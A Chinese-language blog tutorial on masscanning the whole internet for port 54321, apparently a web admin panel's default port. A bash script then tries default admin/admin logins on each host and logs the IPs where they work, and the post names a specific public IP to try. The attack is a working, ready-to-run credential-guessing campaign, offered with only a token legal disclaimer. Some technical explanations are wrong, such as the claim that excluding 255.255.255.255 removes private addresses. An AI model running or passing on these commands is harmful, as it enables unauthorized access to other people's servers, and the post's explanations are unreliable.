详细指南：利用Ubuntu进行面板目标的端口探测操作

admin

```markdown
# 宇宙安全声明
## 1. 相关风险说明
- **安全性：** 进行网络扫描可能会触发服务器管理员或其他网络安全人员的关注。
- **法律责任：** 执行此类操作可能涉及违反相关法律法规。
## 2. VPS选择
为了降低风险，我选择了 AWS 提供的小善人的一年的免费 VPS 服务，操作系统是 Ubuntu。
## 3. 安装masscan
使用 `apt` 包管理器来安装 masscan 和必要的依赖库：
```
sudo apt update && sudo apt install masscan libpcap-dev
```
## 4. 安装nohup和curl
然后安装 `nohup` 和 `curl` 库以支持后台运行脚本和获取文件内容：
```
sudo apt install coreutils
```
## 5. 安装curl和vim
最后安装 `curl` 和 Vim 编辑器：
```
sudo apt install curl
sudo apt install vim
```
## 6. 执行端口扫描
现在我们开始端口扫描。首先切换到 root 用户，并运行以下命令：
```bash
su
nohup masscan 0.0.0.0/0 --exclude 255.255.255.255 -p54321 --max-rate 5000 -oJ scan.json &
```
这里，`0.0.0.0/0` 表示全面扫描，`--exclude 255.255.255.255` 用于排除私有 IP 地址，而 `-p54321` 指定要扫描的端口范围。`--max-rate 5000` 设置了扫描的最大速率限制。`-oJ scan.json` 将扫描结果保存为 JSON 格式。
## 7. 脚本测试端口密码
接下来，创建一个名为 `scan.sh` 的脚本，包含以下代码片段：
```bash
#!/bin/bash
for ip_ad in $(cat scan.json | jq -r '.[].ip'); do
    if curl --max-time 1 http://$ip_ad:54321; then
        res=$(curl "http://$ip_ad:54321/login"  --data-raw 'username=admin&password=admin' --compressed  --insecure)
        if [[ "$res" =~ .*true.* ]]; then
            echo "$ip_ad" >> week.log
            echo "$ip_ad" >> all.log
        fi
    fi
done
```
这个脚本会遍历 `scan.json` 文件中的每一行，检查是否包含有效登录信息。如果有，它会将 IP 地址添加到 `week.log` 或 `all.log` 文件中。
## 8. 运行测试脚本
最后一步是启动测试脚本。这可以通过运行以下命令实现：
```bash
su
nohup bash scan.sh &
```
## 9. 收获IP
等待几分钟或更长时间，你的终端应生成一系列包含 IP 地址的文件。这些 IP 地址位于 `/home/your_user/scan/week.log` 和 `/home/your_user/scan/all.log` 文件中。
## 示例
例如，你可以通过访问 `http://154.44.9.171:54321/` 来验证一个有效的 IP 地址。
请注意，这里的 IP 地址和密码都是公开提供的示例。实际应用时，请确保使用真实且安全的凭据。
如果您发现此教程有帮助，请点赞分享！